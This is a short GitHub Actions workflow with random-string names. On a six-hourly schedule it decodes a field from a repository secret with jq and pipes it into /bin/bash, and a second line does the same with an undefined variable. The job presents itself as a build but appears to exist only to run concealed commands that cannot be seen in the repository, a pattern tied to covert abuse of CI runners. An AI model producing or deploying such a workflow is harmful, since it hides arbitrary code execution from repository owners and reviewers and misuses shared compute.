name: xamiioyj

on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xamiioyj
        env:
          qbbed7: ${{ secrets.qbbed7 }}
        run: |
          echo $qbbed7 | jq -r .wfgsd11 | /bin/bash
          echo $mtkf6 | jq -r .vg12946 | /bin/bash

